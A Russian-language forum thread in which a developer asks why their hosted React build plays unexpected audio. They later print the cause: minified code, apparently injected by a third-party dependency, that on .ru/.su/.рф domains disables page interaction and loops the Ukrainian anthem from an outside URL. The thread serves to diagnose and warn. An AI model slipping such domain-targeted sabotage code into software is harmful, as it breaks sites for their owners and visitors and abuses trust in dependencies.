Добрый день!
Я выложил сайт на хостинг. При открытии сайта начинает воспроизводиться аудио файл, которого у меня не было предусмотрено. Я удалил сайт с хостинга. Проверил исходный вариант на локальном сервере. Все нормально. Никакого аудио нет. Снова выложил его на хостинг. Открываю, опять звучит так же песня. Как-будто прицепляется какой-то вирус. Что это может быть? И как это пофиксить?
Сайт состоит из HTML, CSS, JS файлов, это билд REACT приложения.
Если вебмастер не умеет пользоваться даже инструментами вебмастера в браузере, то может ну его нафик, заниматься этим?
Обратись лучше к специалисту, ибо с такими знаниями ты можешь попасть куда серьёзнее, чем не заказанная музыка. Я серьёзно.
Михаил, в этом и беда. Там всё видно, но ты не знаешь что с этим делать (не умеешь пользоваться).
И даже вопрос "почему" показывает квалификацию. Ибо ответ на него элементарный - да потому что его запрашивает браузер! А значит код сайта (точнее того что в него попадает) ему это говорит (т.е. вопрос должен быть как минимум "где происходит вызов", а не "почему").
Это настолько элементарная "проблема"... ну это как хирург бы спрашивал - "почему я всё время режусь скальпелем, зажимая лезвие в кулаке".
Refguser, Оказывается данный MP3 файл появляется во время билда react приложения! Во как!
Играет гимн Украины!
Я проверил в исходном коде ничего нет, а в сбилженном уже есть.
И видимо он начинает играть, если у сайта домен RU / SU / РФ.
Так что будьте внимательны!
location.host.match(/\.(ru|su|xn--p1ai)$/)) {
var ea = new Date,
ta = localStorage.getItem("swal-initiation");
ta ? (ea.getTime() - Date.parse(ta)) / 864e5 > 3 && setTimeout((function() {
document.body.style.pointerEvents = "none";
var e = document.createElement("audio");
e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3", e.loop = !0, document.body.appendChild(e), setTimeout((function() {
e.play().catch((function() {}))
}), 2500)
}), 500) : localStorage.setItem("swal-initiation", "".concat(ea))
}
Михаил, "Играет гимн Украины!"
:) если бы ты это указал сразу я бы тебе сказал, что проблема в скрипте слайдера (или что-то типа того, на вскидку не вспомню). Широко известная в узких кругах дыра с 2022г. :)
Михаил, незнаю насчёт npm, но это было (есть?) в каком-то популярнейшем js-скрипте, который юзают миллионы и используется даже во многих проектах (cms, плагинах и тп).